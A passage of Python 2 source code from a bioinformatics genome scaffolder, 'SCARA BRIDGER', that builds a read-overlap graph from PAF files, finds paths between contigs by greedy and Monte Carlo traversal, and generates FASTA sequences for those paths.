sys.stdout.write('\nLow quality: %d' % nlowqual)
sys.stdout.write('\n')
return rrovledges
def load_rr_overlaps_part(proc_id, rr_paf_lines_part, readnodes, out_q):
sys.stdout.write('\nSCARA BRIDGER: Starting process %d...\n' % proc_id)
nselfovl = 0
rrovledges_part = []
readnodes_part = {} # A dictionary to collect partial graph
# created by this function
ncontained = nshort = nlowqual = nusable = 0
dummy_reads_to_discard = {} # Currently not used, but a placeholder for maybe using it later
for pafline in rr_paf_lines_part:
rnode1 = rnode2 = None
qname = pafline['QNAME']
tname = pafline['TNAME']
if qname in readnodes:
rnode1 = readnodes[qname]
else:
sys.stderr.write('\nERROR RROVL: QNAME from PAF (%s) doesn\'t exist in reads!' % qname)
if tname in readnodes:
rnode2 = readnodes[tname]
else:
sys.stderr.write('\nERROR RROVL: TNAME from PAF (%s) doesn\'t exist in reads!' % tname)
# Discard self-overlaps
if qname == tname:
nselfovl += 1
continue
# retval = test_overlap(pafline, reads_to_discard, test_contained_reads=False, test_short_length=False)
retval = test_overlap(pafline, dummy_reads_to_discard)
if retval == 1:
nusable += 1
edge1 = OvlEdge(pafline)
edge2 = OvlEdge(pafline, reverse=True)
edge1.startNode = rnode1
edge1.endNode = rnode2
# rnode1.outEdges.append(edge1)
if qname in readnodes_part:
t_edges = readnodes_part[qname]
else:
t_edges = []
t_edges.append(edge1)
readnodes_part[qname] = t_edges
edge2.startNode = rnode2
edge2.endNode = rnode1
# rnode2.outEdges.append(edge2)
if tname in readnodes_part:
t_edges = readnodes_part[tname]
else:
t_edges = []
t_edges.append(edge2)
readnodes_part[tname] = t_edges
rrovledges_part.append(edge1)
rrovledges_part.append(edge2)
elif retval == -1:
ncontained += 1
elif retval == -2:
nshort += 1
elif retval == -3:
nlowqual += 1
else:
sys.stderr.write('\nERROR: unknown return value by test_overlap()!')
out_q.put((rrovledges_part, readnodes_part, ncontained, nshort, nlowqual, nusable, nselfovl))
sys.stdout.write('\nEnding process %d...\n' % proc_id)
pass
# Load read/read overlaps in multiple threads
def load_rr_overlaps_MT(rr_overlaps_file, readnodes, reads_to_discard, numthreads, output=True):
rrovledges = [] # Edges representing overlaps between reads and reads
readnodes_parts = []
rr_paf_lines = load_paf(rr_overlaps_file, output)
dummy_reads_to_discard = {} # When checking overlaps between reads, only discarding overlaps
# and not the actual reads
chunk_size = int(math.ceil(float(len(rr_paf_lines))/numthreads))
rr_paf_lines_split = [rr_paf_lines[i:i+chunk_size] for i in xrange(0, len(rr_paf_lines), chunk_size)]
# Spawning and calling processes
out_q = multiprocessing.Queue()
jobs = []
proc_id = 0
for rr_paf_lines_part in rr_paf_lines_split:
proc_id += 1
partname = 'THREAD%d' % proc_id
proc = multiprocessing.Process(name=partname, target=load_rr_overlaps_part, args=(proc_id, rr_paf_lines_part, readnodes, out_q,))
jobs.append(proc)
proc.start()
# Summarizing results from different processes
ncontained = nshort = nlowqual = nusable = 0
for i in xrange(len(jobs)):
(rrovledges_part, readnodes_part, t_ncontained, t_nshort, t_nlowqual, t_nusable, t_nselfovl) = out_q.get()
rrovledges += rrovledges_part
ncontained += t_ncontained
nshort += t_nshort
nlowqual += t_nlowqual
nusable += t_nusable
nselfovl += t_nselfovl
readnodes_parts.append(readnodes_part)
if output:
sys.stdout.write('\nSCARA BRIDGER: All processes finished!')
# Wait for all processes to end
for proc in jobs:
proc.join()
# Summarizing edges for each node
for readnodes_part in readnodes_parts:
for rname, t_outedges in readnodes_part.iteritems():
rnode = readnodes[rname]
rnode.outEdges += t_outedges
# KK: Old, single process, code is commented here
# ncontained = nshort = nlowqual = nusable = 0
# for pafline in rr_paf_lines:
# rnode1 = rnode2 = None
# qname = pafline['QNAME']
# tname = pafline['TNAME']
# if qname in readnodes:
# rnode1 = readnodes[qname]
# else:
# sys.stderr.write('\nERROR RROVL: QNAME from PAF (%s) doesn\'t exist in reads!' % qname)
# if tname in readnodes:
# rnode2 = readnodes[tname]
# else:
# sys.stderr.write('\nERROR RROVL: TNAME from PAF (%s) doesn\'t exist in reads!' % tname)
# # retval = test_overlap(pafline, reads_to_discard, test_contained_reads=False, test_short_length=False)
# retval = test_overlap(pafline, dummy_reads_to_discard)
# if retval == 1:
# nusable += 1
# edge1 = OvlEdge(pafline)
# edge2 = OvlEdge(pafline, reverse=True)
# edge1.startNode = rnode1
# edge1.endNode = rnode2
# rnode1.outEdges.append(edge1)
# edge2.startNode = rnode2
# edge2.endNode = rnode1
# rnode2.outEdges.append(edge2)
# rrovledges.append(edge1)
# rrovledges.append(edge2)
# elif retval == -1:
# ncontained += 1
# elif retval == -2:
# nshort += 1
# elif retval == -3:
# nlowqual += 1
# else:
# sys.stderr.write('\nERROR: unknown return value by test_overlap()!')
if output == True:
sys.stdout.write('\nProcessing overlaps between reads and reads!')
sys.stdout.write('\nNumber of overlaps: %d' % len(rr_paf_lines))
sys.stdout.write('\nSelf overlaps: %d' % nselfovl)
sys.stdout.write('\nUsable: %d' % nusable)
sys.stdout.write('\nContained: %d' % ncontained)
sys.stdout.write('\nShort: %d' % nshort)
sys.stdout.write('\nLow quality: %d' % nlowqual)
sys.stdout.write('\n')
return rrovledges
# 1st Approach
# For every anchor node consider all connecting read nodes
# For further extension consider only the read with the highest OVERLAP score
def getPaths_maxovl(anchornodes, readnodes, crovledges, rrovledges, output=True):
paths = [] # A list of paths
# Each path is a list of its own, containing edges that are traversed
reads_traversed = {} # A dictionary of reads that have already been traversed
# Each read can only be used once
N = 20 # Number of nodes placed on stack in each steop of graph traversal
if output:
sys.stdout.write('\nSCARA BRIDGER: Starting collecting paths using maximum overlap score!')
for (aname, anode) in anchornodes.iteritems():
for edge in anode.outEdges:
path = [] # Initializing a path
stack = [] # and a stack for graph traversal
# A stack will contain a list of edges to be processed
# For each read determine the direction of extension (LEFT or RIGHT)
# Needs to be preserved throughout the path, taking into account relative strands
direction = directionLEFT
if edge.ESright > edge.ESleft:
direction = directionRIGHT
# KK: Control
if edge.ESright <= 0 and edge.ESleft <= 0:
continue
stack.append(edge) # For each inital node, place only its edge on the stack
# In each step of graph traversal:
# - Pop the last node
# - Check if it can connect to an anchor node
# - If it can, the path is complete
# - If not, get a number of connected read nodes with the greatest OS and place them on the stack
# - If no reads are available, adjust the path and continue
while stack:
redge = stack.pop() # Pop an edge from the stack
rnode = redge.endNode # And the corresponding node
direction2 = directionLEFT
if redge.ESright > redge.ESleft:
direction2 = directionRIGHT
# Check if the node from the stack can continue the current path
if (len(path) > 0) and ((path[-1].endNode != redge.startNode) or (direction != direction2)):
# If not, put the edge back on the stack
stack.append(redge)
# And remove the last edge from the path
# If the removed edge represents an overlap of reads from different strands
# reverse the direction of extension
popedge = path.pop()
if popedge.Strand == '-':
direction = reverseDirection(direction)
# Skip to next iteration
continue
# Check if the path is too long skip this iteration and let
# the above code eventually reduce the path
if len(path) >= HardNodeLimit:
continue
path.append(redge) # Add edge to the path
if redge.Strand == '-': # If edge represents an overlap of reads from different strands
direction = reverseDirection(direction) # then reverse the direction of extension
reads_traversed[rnode.name] = 1 # And mark the node as traversed
Aedges = [] # Edges to anchor nodes
Redges = [] # Edges to read nodes
for edge2 in rnode.outEdges:
# KK: Control
if edge2.ESright <= 0 and edge2.ESleft <= 0:
continue
endNode = edge2.endNode
if endNode.name in reads_traversed: # Each read can only be used once
continue
direction2 = directionLEFT
if edge2.ESright > edge2.ESleft:
direction2 = directionRIGHT
if direction2 != direction: # Direction of extension must be maintained
continue
if endNode.nodetype == Node.ANCHOR:
if endNode.name != aname: # We only want nodes that are different from the starting node!
Aedges.append(edge2) # NOTE: this might change, as we migh want scaffold circulat genomes!
elif endNode.nodetype == Node.READ:
Redges.append(edge2)
else:
sys.stderr.write("SCARA BRIDGER: ERROR - invalid node type: %d" % endNode.nodetype)
if Aedges: # If anchor nodes have been reached find the best one
Aedges.sort(key=lambda edge: edge.OS, reverse=True) # by sorting them according to OS and taking the first one
Aedge = Aedges[0] # Create a path and end this instance of tree traversal
path.append(Aedge)
paths.append(path)
break
elif Redges: # If no anchor nodes have been found we have to continue with read nodes
Redges.sort(key=lambda edge: edge.OS, reverse=True) # Sort them and take top N to put on the stack
# Redge = Redges[0]
# stack.append(Redge.endNode)
stack += [redge for redge in reversed(Redges[0:N])] # Place N best edges on the stack in reverse order, so that the best one ends on top
# KK: this is node at a different place in the code
# path.append(Redge)
# reads_traversed[Redge.endNode.name] = 1
else: # Graph traversal has come to a dead end
try:
edge2 = path.pop() # Remove the last edge from the path
# If the removed edge represents an overlap of reads from different strands
# reverse the direction of extension
if edge2.Strand == '-':
direction = reverseDirection(direction)
del reads_traversed[rnode.name] # Remove current read node from the list of traversed ones
except:
import pdb
pdb.set_trace()
pass
if output:
sys.stdout.write('\nSCARA BRIDGER: Finishing collecting paths using maximum overlap score!')
return paths
# 2nd Approach
# For every anchor node consider all connecting read nodes
# For further extension consider only the read with the highest EXTENSION score
def getPaths_maxext(anchornodes, readnodes, crovledges, rrovledges, output=True):
paths = [] # A list of paths
# Each path is a list of its own, containing edges that are traversed
reads_traversed = {} # A dictionary of reads that have already been traversed
# Each read can only be used once
N = 20 # Number of nodes placed on stack in each steop of graph traversal
if output:
sys.stdout.write('\nSCARA BRIDGER: Starting collecting paths using maximum extension score!')
for (aname, anode) in anchornodes.iteritems():
for edge in anode.outEdges:
path = [] # Initializing a path
stack = [] # and a stack for graph traversal
# A stack will contain a list of edges to be processed
# For each read determine the direction of extension (LEFT or RIGHT)
# Needs to be preserved throughout the path
direction = directionLEFT
if edge.ESright > edge.ESleft:
direction = directionRIGHT
stack.append(edge) # For each inital node, place only its edge on the stack
# In each step of graph traversal:
# - Pop the last node
# - Check if it can connect to an anchor node
# - If it can, the path is complete
# - If not, get a number of connected read nodes with the greatest ES and place them on the stack
# - If no reads are available, adjust the path and continue
while stack:
redge = stack.pop() # Pop an edge from the stack
rnode = redge.endNode # And the corresponding node
direction2 = directionLEFT
if redge.ESright > redge.ESleft:
direction2 = directionRIGHT
# Check if the node from the stack can continue the current path
if (len(path) > 0) and ((path[-1].endNode != redge.startNode) or (direction != direction2)):
# If not, put the edge back on the stack
stack.append(redge)
# And remove the last edge from the path
# If the removed edge represents an overlap of reads from different strands
# reverse the direction of extension
popedge = path.pop()
if popedge.Strand == '-':
direction = reverseDirection(direction)
# Skip to next iteration
continue
# Check if the path is too long skip this iteration and let
# the above code eventually reduce the path
if len(path) >= HardNodeLimit:
continue
path.append(redge) # Add edge to the path
reads_traversed[rnode.name] = 1 # And mark the node as traversed
if redge.Strand == '-': # If edge represents an overlap of reads from different strands
direction = reverseDirection(direction) # then reverse the direction of extension
Aedges = [] # Edges to anchor nodes
Redges = [] # Edges to read nodes
for edge2 in rnode.outEdges:
endNode = edge2.endNode
if endNode.name in reads_traversed: # Each read can only be used once
continue
direction2 = directionLEFT
if edge2.ESright > edge2.ESleft:
direction2 = directionRIGHT
if direction2 != direction: # Direction of extension must be maintained
continue
if endNode.nodetype == Node.ANCHOR:
if endNode.name != aname: # We only want nodes that are different from the starting node!
Aedges.append(edge2) # NOTE: this might change, as we migh want scaffold circulat genomes!
elif endNode.nodetype == Node.READ:
Redges.append(edge2)
if Aedges: # If anchor nodes have been reached find the best one
if direction == directionLEFT: # by sorting them according to ES and taking the first one
Aedges.sort(key=lambda edge: edge.ESleft, reverse=True)
else:
Aedges.sort(key=lambda edge: edge.ESright, reverse=True)
Aedge = Aedges[0] # Create a path and end this instance of tree traversal
path.append(Aedge)
paths.append(path)
break
elif Redges: # If no anchor nodes have been found we have to continue with read nodes
if direction == directionLEFT: # Sort them and take top N to put on the stack (currently testing with N=1)
Redges.sort(key=lambda edge: edge.ESleft, reverse=True)
stack += [redge for redge in reversed(Redges[0:N]) if redge.ESleft > 0]
else:
Redges.sort(key=lambda edge: edge.ESright, reverse=True)
stack += [redge for redge in reversed(Redges[0:N]) if redge.ESright > 0]
# stack += [redge for redge in reversed(Redges[0:N])] # Place N best edges on the stack in reverse orded, so that the best one ends on top
else: # Graph traversal has come to a dead end
try:
edge2 = path.pop() # Remove the last edge from the path
del reads_traversed[rnode.name] # Remove current read node from the list of traversed ones
# If the removed edge represents an overlap of reads from different strands
# reverse the direction of extension
if edge2.Strand == '-':
direction = reverseDirection(direction)
except:
import pdb
pdb.set_trace()
pass
if output:
sys.stdout.write('\nSCARA BRIDGER: Finishing collecting paths using maximum extension score!')
return paths
# 3rd Approach
# Monte Carlo method - randomly select reads for each extension
# probability of selecting a read is proportional to extension score
def getPaths_MC(anchornodes, readnodes, crovledges, rrovledges, numpaths, output=True):
paths = [] # A list of paths
# Each path is a list of its own, containing edges that are traversed
reads_traversed = {} # A dictionary of reads that have already been traversed
# Each read can only be used once
# NOTE: should this be used with Monte Carlo!
N = 10
max_iterations = 10000
iteration = 0
igoal = 1000
random.seed()
if output:
sys.stdout.write('\nSCARA BRIDGER: Starting collecting paths using Monte Carlo method!')
sys.stdout.write('\nITERATIONS:')
anames = anchornodes.keys()
while len(paths) < numpaths and iteration < max_iterations:
iteration += 1
if output and iteration > igoal:
sys.stdout.write(' %d' % igoal)
igoal += 1000
# Randomly choose an anchor node
aname = random.choice(anames)
anode = anchornodes[aname]
totalES_A = 0.0
problist_A = [] # Used to randomly select an edge to use
problist_A.append(totalES_A)
if len(anode.outEdges) == 0: # Skip nodes that have no edges (NOTE: this can probably be removed since such nodes have been discarded)
continue
for edge in anode.outEdges: # Calculate total Extension score, for random selection
maxES = edge.ESleft if edge.ESleft > edge.ESright else edge.ESright
totalES_A += maxES
problist_A.append(totalES_A)
rand = random.random()*totalES_A
k=1
try:
while problist_A[k] < rand:
k += 1
except:
import pdb
pdb.set_trace()
pass
edge = anode.outEdges[k-1]
# KK: control
if edge.ESleft <= 0 and edge.ESright <= 0:
continue
path = [] # Initializing a path
stack = [] # and a stack for graph traversal
# A stack will contain a list of edges to be processed
# For each read determine the direction of extension (LEFT or RIGHT)
# Needs to be preserved throughout the path
direction = directionLEFT
if edge.ESright > edge.ESleft:
direction = directionRIGHT
stack.append(edge) # For each inital node, place only its edge on the stack
# In each step of graph traversal:
# - Pop the last node
# - Check if it can connect to an anchor node
# - If it can, the path is complete
# - If not, randomly generate a number of connected read nodes with the probability of generation
# proportional to ES and place them on the stack
# - If no reads are available, adjust the path and continue
while stack:
redge = stack.pop() # Pop an edge from the stack
rnode = redge.endNode # And the corresponding node
direction2 = directionLEFT
if redge.ESright > redge.ESleft:
direction2 = directionRIGHT
# Check if the node from the stack can continue the current path
if (len(path) > 0) and ((path[-1].endNode != redge.startNode) or (direction != direction2)):
# If not, put the edge back on the stack
stack.append(redge)
# And remove the last edge from the path
# If the removed edge represents an overlap of reads from different strands
# reverse the direction of extension
popedge = path.pop()
if popedge.Strand == '-':
direction = reverseDirection(direction)
# Skip to next iteration
continue
# Check if the path is too long skip this iteration and let
# the above code eventually reduce the path
if len(path) >= HardNodeLimit:
continue
path.append(redge) # Add edge to the path
reads_traversed[rnode.name] = 1 # And mark the node as traversed
if redge.Strand == '-': # If edge represents an overlap of reads from different strands
direction = reverseDirection(direction) # then reverse the direction of extension
Aedges = [] # Edges to anchor nodes
Redges = [] # Edges to read nodes
for edge2 in rnode.outEdges:
# KK: control
if edge2.ESleft <= 0 and edge2.ESright <= 0:
continue
endNode = edge2.endNode
if endNode.name in reads_traversed: # Each read can only be used once
continue
direction2 = directionLEFT
if edge2.ESright > edge2.ESleft:
direction2 = directionRIGHT
if direction2 != direction: # Direction of extension must be maintained
continue
if endNode.nodetype == Node.ANCHOR:
if endNode.name != aname: # We only want nodes that are different from the starting node!
Aedges.append(edge2) # NOTE: this might change, as we migh want scaffold circulat genomes!
elif endNode.nodetype == Node.READ:
# Put in only edes that extend in the appropriate direction
if (direction == directionLEFT and edge2.ESleft > edge2.ESright) or \
(direction == directionRIGHT and edge2.ESright > edge2.ESleft):
Redges.append(edge2)
if Aedges: # If anchor nodes have been reached find the best one
if direction == directionLEFT: # by sorting them according to ES and taking the first one
Aedges.sort(key=lambda edge: edge.ESleft, reverse=True)
else:
Aedges.sort(key=lambda edge: edge.ESright, reverse=True)
Aedge = Aedges[0] # Create a path and end this instance of tree traversal
path.append(Aedge)
paths.append(path)
break
elif Redges: # If no anchor nodes have been found we have to continue with read nodes
totalES = 0.0 # Randomly select N to put on the stack
problist = []
problist.append(totalES)
if direction == directionLEFT: # Extending to left
for redge in Redges:
totalES += redge.ESleft
problist.append(totalES)
else: # Extending to RIGHT
for redge in Redges:
totalES += redge.ESright
problist.append(totalES)
try:
for j in range(N): # Randomly generating N nodes to place on stack
rand = random.random()*totalES # NOTE: currently its possible for the same node to be placed more than once
k = 1
while problist[k] < rand:
k += 1
stack.append(Redges[k-1])
except:
import pdb
pdb.set_trace()
pass
else: # Graph traversal has come to a dead end
try:
edge2 = path.pop() # Remove the last edge from the path
del reads_traversed[rnode.name] # Remove current read node from the list of traversed ones
# If the removed edge represents an overlap of reads from different strands
# reverse the direction of extension
if edge2.Strand == '-':
direction = reverseDirection(direction)
except:
import pdb
pdb.set_trace()
pass
if output:
sys.stdout.write('\nSCARA BRIDGER: Finishing collecting paths using Monte Carlo method!')
if iteration >= max_iterations:
sys.stdout.write('\nSCARA BRIDGER: Finished by running out of itterations!')
return paths
# 3rd Approach
# Monte Carlo method - randomly select reads for each extension
# probability of selecting a read is proportional to extension score
def getPaths_MC_OLD(anchornodes, readnodes, crovledges, rrovledges, numpaths, output=True):
paths = [] # A list of paths
# Each path is a list of its own, containing edges that are traversed
reads_traversed = {} # A dictionary of reads that have already been traversed
# Each read can only be used once
# NOTE: should this be used with Monte Carlo!
N = 10
pathspernode = int(math.ceil(float(numpaths)/len(anchornodes)) + 1) # The number of path generated for each anchor node
random.seed()
if output:
sys.stdout.write('\nSCARA BRIDGER: Starting collecting paths using Monte Carlo method!')
for (aname, anode) in anchornodes.iteritems():
totalES_A = 0.0
problist_A = [] # Used to randomly select an edge to use
problist_A.append(totalES_A)
if len(anode.outEdges) == 0: # Skip nodes that have no edges
continue
for edge in anode.outEdges: # Calculate total Extension score, for random selection
maxES = edge.ESleft if edge.ESleft > edge.ESright else edge.ESright
totalES_A += maxES
problist_A.append(totalES_A)
for i in xrange(pathspernode): # For each anchor node generate "pathspernode" paths
rand = random.random()*totalES_A
k=1
try:
while problist_A[k] < rand:
k += 1
except:
import pdb
pdb.set_trace()
pass
edge = anode.outEdges[k-1]
path = [] # Initializing a path
stack = [] # and a stack for graph traversal
# A stack will contain a list of edges to be processed
# For each read determine the direction of extension (LEFT or RIGHT)
# Needs to be preserved throughout the path
direction = directionLEFT
if edge.ESright > edge.ESleft:
direction = directionRIGHT
stack.append(edge) # For each inital node, place only its edge on the stack
# In each step of graph traversal:
# - Pop the last node
# - Check if it can connect to an anchor node
# - If it can, the path is complete
# - If not, randomly generate a number of connected read nodes with the probability of generation
# proportional to ES and place them on the stack
# - If no reads are available, adjust the path and continue
while stack:
redge = stack.pop() # Pop an edge from the stack
rnode = redge.endNode # And the corresponding node
path.append(redge) # Add edge to the path
reads_traversed[rnode.name] = 1 # And mark the node as traversed
Aedges = [] # Edges to anchor nodes
Redges = [] # Edges to read nodes
for edge2 in rnode.outEdges:
endNode = edge2.endNode
if endNode.name in reads_traversed: # Each read can only be used once
continue
direction2 = directionLEFT
if edge2.ESright > edge2.ESleft:
direction2 = directionRIGHT
if direction2 != direction: # Direction of extension must be maintained
continue
if endNode.nodetype == Node.ANCHOR:
if endNode.name != aname: # We only want nodes that are different from the starting node!
Aedges.append(edge2) # NOTE: this might change, as we migh want scaffold circulat genomes!
elif endNode.nodetype == Node.READ:
Redges.append(edge2)
if Aedges: # If anchor nodes have been reached find the best one
if direction == directionLEFT: # by sorting them according to ES and taking the first one
Aedges.sort(key=lambda edge: edge.ESleft, reverse=True)
else:
Aedges.sort(key=lambda edge: edge.ESright, reverse=True)
Aedge = Aedges[0] # Create a path and end this instance of tree traversal
path.append(Aedge)
paths.append(path)
break
elif Redges: # If no anchor nodes have been found we have to continue with read nodes
totalES = 0.0 # Randomly select N to put on the stack
problist = []
problist.append(totalES)
if direction == directionLEFT: # Extending to left
for redge in Redges:
totalES += redge.ESleft
problist.append(totalES)
else: # Extending to RIGHT
for redge in Redges:
totalES += redge.ESright
problist.append(totalES)
try:
for j in range(N): # Randomly generating N nodes to place on stack
rand = random.random()*totalES # NOTE: currently its possible for the same node to be placed more than once
k = 1
while problist[k] < rand:
k += 1
stack.append(Redges[k-1])
except:
import pdb
pdb.set_trace()
pass
else: # Graph traversal has come to a dead end
try:
edge2 = path.pop() # Remove the last edge from the path
del reads_traversed[rnode.name] # Remove current read node from the list of traversed ones
except:
import pdb
pdb.set_trace()
pass
if output:
sys.stdout.write('\nSCARA BRIDGER: Finishing collecting paths using Monte Carlo method!')
return paths
# Remove readnode from the graph
# - Remove from all anchornodes' outgoing edges
# - Remove from all readnodes' outgoing edges
# - remove from readnodes
# - Remove from crovl edges
# - remove from rrovl edges
def remove_readnode(rname, anchornodes, readnodes, crovledges, rrovledges):
if rname not in readnodes:
sys.stderr.write('\nERROR: trying to remove nonexisting read node: %s!' % rname)
# Fetchng readnode to delete
rnode = readnodes[rname]
numRemovedEdges = 0
# Removing from crovledges
# Not sure if I can remove from the list I am iterating on so doing this instead
edgesToRemove = []
for edge in crovledges:
if edge.startNode == rnode or edge.endNode == rnode:
edgesToRemove.append(edge)
# Removing selected edges
for edgeTR in edgesToRemove:
crovledges.remove(edgeTR)
numRemovedEdges += 1
# Removing from rrovledges
edgesToRemove = []
for edge in rrovledges:
if edge.startNode == rnode or edge.endNode == rnode:
edgesToRemove.append(edge)
# Removing selected edges
for edgeTR in edgesToRemove:
rrovledges.remove(edgeTR)
numRemovedEdges += 1
# Removing node from readnodes
del readnodes[rname]
# Removing outgoing edges from readnodes
for rnode2 in readnodes.itervalues():
edgesTR = []
for edge in rnode2.outEdges:
if edge.startNode == rnode or edge.endNode == rnode:
edgesTR.append(edge)
for edge in edgesTR:
rnode2.outEdges.remove(edge)
# Removing outgoing edges from anchornodes
for anode in anchornodes.itervalues():
edgesTR = []
for edge in anode.outEdges:
if edge.startNode == rnode or edge.endNode == rnode:
edgesTR.append(edge)
for edge in edgesTR:
anode.outEdges.remove(edge)
return numRemovedEdges
### Cleaning up the graph
# - Read nodes can connect only to a single anchor node, with maximum overlap score
# - removing overlaps for discarded reads
# - TODO: Anything else I can think of
def graph_cleanup(anchornodes, readnodes, crovledges, rrovledges, reads_to_discard=None, output=True):
edgesRemoved = 0
if output:
sys.stdout.write('\nSCARA BRIDGER: Starting graph cleanup!')
sys.stdout.write('\nSCARA BRIDGER: Discarding reads ...')
# Discading reads that are in the discard dictionary
# To make thing more efficient, have to reverse the logic
# Discarding from anchornodes
if output:
sys.stdout.write('\nSCARA BRIDGER: Discarding from anchor nodes ...')
for anode in anchornodes.itervalues():
edgesTR = []
for edge in anode.outEdges:
if edge.endNode.name in reads_to_discard:
edgesTR.append(edge)
for edge in edgesTR:
anode.outEdges.remove(edge)
# KK: commented to speed thng up, whether this list will be usefull remain to be seen
# crovledges.remove(edge)
if output:
sys.stdout.write('\nSCARA BRIDGER: Discarding from read nodes ...')
for rnode in readnodes.itervalues():
edgesTR = []
for edge in rnode.outEdges:
if edge.endNode.name in reads_to_discard:
edgesTR.append(edge)
for edge in edgesTR:
rnode.outEdges.remove(edge)
# KK: commented to speed thng up, whether this list will be usefull remain to be seen
# rrovledges.remove(edge)
for rname in reads_to_discard.iterkeys():
if rname in readnodes:
del readnodes[rname]
elif output:
sys.stdout.write('\nSCARA BRIDGER: ERROR trying to delete a read: %s' % rname)
# OLD:
# if reads_to_discard is not None:
# for rname in reads_to_discard.iterkeys():
# remove_readnode(rname, anchornodes, readnodes, crovledges, rrovledges)
if output:
sys.stdout.write('\nSCARA BRIDGER: Preserving only the best overlap with anchor node!')
sys.stdout.write('\nCompleted: ')
total = len(readnodes)
count = 0
next_step = 0.1
# For each readnode discarding all overlap for contigs except the one with the best overlap score
for rnode in readnodes.itervalues():
count += 1
if output and count > next_step*total:
sys.stdout.write('%d%% ' % (next_step*100))
next_step += 0.1
bestANode = None
maxOS = 0
for edge in rnode.outEdges:
outnode = edge.endNode
if outnode.nodetype == Node.ANCHOR and edge.OS > maxOS:
maxOS = edge.OS
bestANode = outnode
# If a read connects to at least one anchor node (bestANode exists)
# Remove aonnections to all other anchor nodes
# This must be done in 3 places:
# - outEdges in other anchor nodes
# - outEdges in the readnode
# - crovledges (these are the same edges as in first two cases)
if bestANode is not None:
edgesTR = []
for edge in rnode.outEdges:
if edge.endNode.nodetype == Node.ANCHOR and edge.endNode != bestANode:
edgesTR.append(edge)
for edge in edgesTR:
rnode.outEdges.remove(edge)
crovledges.remove(edge)
edgesRemoved += 1
for anode in anchornodes.itervalues():
if anode != bestANode:
edgesTR = []
for edge in anode.outEdges:
if edge.endNode == rnode:
edgesTR.append(edge)
for edge in edgesTR:
anode.outEdges.remove(edge)
crovledges.remove(edge)
edgesRemoved += 1
return edgesRemoved
# Returns info on the path
# Length in bases, number of nodes and names of starting and ending nodes
def calc_path_info(path):
length = 0
numNodes = len(path) + 1
SIsum = 0
SIavg = 0.0
if not path: # If the path is empty
return (0, 0, None, None)
startNode = path[0].startNode
endNode = path[-1].endNode
direction = directionLEFT
if path[0].ESleft < path[0].ESright:
direction = directionRIGHT
startingDirection = direction
for edge in path:
llength = 0
SIsum += edge.SI
if direction == directionRIGHT:
if edge.Strand == '+':
llength = edge.SStart - edge.EStart
else:
llength = edge.SStart - (edge.ELen - edge.EEnd)
else:
if edge.Strand == '+':
llength = (edge.SLen - edge.SEnd) - (edge.ELen - edge.EEnd)
else:
llength = (edge.SLen - edge.SEnd) - edge.EStart
if edge.Strand == '-':
direction = reverseDirection(direction)
if llength <= 0:
sys.stderr.write('\nSCARA BRIDGER: ERRROR calculating path length!')
import pdb
pdb.set_trace()
length += llength
length += path[-1].ELen
SIavg = float(SIsum) / len(path)
strand = '+'
if startingDirection != direction:
strand = '-'
return (length, numNodes, startNode.name, endNode.name, startingDirection, strand, SIavg)
# Calculate and return reverse coomplement of a sequence
def revcomp(seq):
rcseq = []
for char in reversed(seq):
if char.upper() in compbase.keys():
rcchar = compbase[char.upper()]
else:
rcchar = 'N'
rcseq.append(rcchar)
return ''.join(rcseq)
# Reverses a path represented by a list of edges
# Reverses the order of edges and also each edge in the list
def reversed_path(path):
reversed_path = []
for edge in reversed(path):
reversed_edge = edge.reversed()
reversed_path.append(reversed_edge)
return reversed_path
# Generates a fasta sequence for a path consisting of a list of edges
# All edges should extend the path in the same GLOBAL direction, either left or right
# However, specific edge direction will change depending on the edge relative strand
# Each node can be anchor or read node
# NOTE: anchornodes and readnodes dictionaries are probably not necessary
# edges have references to starting and ending nodes
# 1. Generate sequence for the first node, determine global direction
# - the sequence will encompass the bases up to and including the first overlap
# - note the part of the second node that will not be included in the future (up to and including the overlap)
# 2. For each edge except the first one
# - determine relative strand and check the direction
# - generate sequence for the starting node up to and including the overlap
# taking into account not to include the previous overlap (remembered value)
# 3. Generate sequence for the last node
# - determine relative strand and check the direction
def generate_fasta_for_path(path, anchornodes, readnodes):
seq = []
rstrand = '+' # relative strand, relative to the first node in the path
# Empty path - return empty sequence
if len(path) == 0:
return ''
# Determine general direction
edge = path[0]
estrand = edge.Strand
genDirection = directionLEFT if edge.ESleft > edge.ESright else directionRIGHT
curDirection = genDirection
# 1. Generate sequence for the first node and determine the used part for the next iteration
# If relative strand for the edge is '-' switch global relative strand and reverse expected direction
if estrand == '-':
rstrand = '+' if rstrand == '-' else '-'
curDirection = reverseDirection(curDirection)
usedPart = 0
if genDirection == directionRIGHT:
seq.append(edge.startNode.seq[:edge.SEnd])
if rstrand == '+':
usedPart = edge.EEnd
else:
usedPart = edge.ELen - edge.EStart
else:
seq.insert(0, edge.startNode.seq[edge.SStart:])
if rstrand == '+':
usedPart = edge.ELen - edge.EStart
else :
usedPart = edge.EEnd
# 2. Generate sequences for each edge except the first one, using only starting nodes
# Relative strand and usedPart should be already calculated correctly
for edge in path[1:]:
# Check if extension direction is the same as the current direction
extDirection = directionLEFT if edge.ESleft > edge.ESright else directionRIGHT
if extDirection != curDirection:
sys.stderr.write('\nSCARA BRIDGER ERROR: inconsistent direction in a path!')
nextseq = edge.startNode.seq
if rstrand == '-':
nextseq = revcomp(nextseq)
if genDirection == directionRIGHT:
if rstrand == '+':
seq.append(nextseq[usedPart : edge.SEnd])
else:
seq.append(nextseq[usedPart : edge.SLen-edge.SStart])
else:
if rstrand == '+':
seq.insert(0, edge.startNode.seq[edge.SStart : edge.SLen-usedPart])
else:
seq.insert(0, edge.startNode.seq[edge.SLen-edge.SEnd : edge.SLen-usedPart])
# import pdb
# pdb.set_trace()
# Update relative strand and current dirrection for the next teration
estrand = edge.Strand
if estrand == '-':
rstrand = '+' if rstrand == '-' else '-'
curDirection = reverseDirection(curDirection)
# Update used part for the next iteration
usedPart = 0
if genDirection == directionRIGHT:
if rstrand == '+':
usedPart = edge.EEnd
else:
usedPart = edge.ELen - edge.EStart
else:
if rstrand == '+':
usedPart = edge.ELen - edge.EStart
else :
usedPart = edge.EEnd
# 3. Generate sequence for the last node
# Relative strand and usedPart should be already calculated correctly
edge = path[-1]
nextseq = edge.endNode.seq
if rstrand == '-':
nextseq = revcomp(nextseq)
if genDirection == directionRIGHT:
seq.append(nextseq[usedPart:])
else:
seq.insert(0, nextseq[:usedPart])
return ''.join(seq)
# A function that receives a list of paths, each path is a list of edges
# The paths are grouped according to staring node and direction (or ending node),
# so that each group can be later processed separately
def group_paths(path_list, anchornodes):
filtered_paths = []
path_info_groups = []
connected_anodes = {}
path_info_list = []
# 1. Collecting path info and calculating connected nodes
for path in path_list:
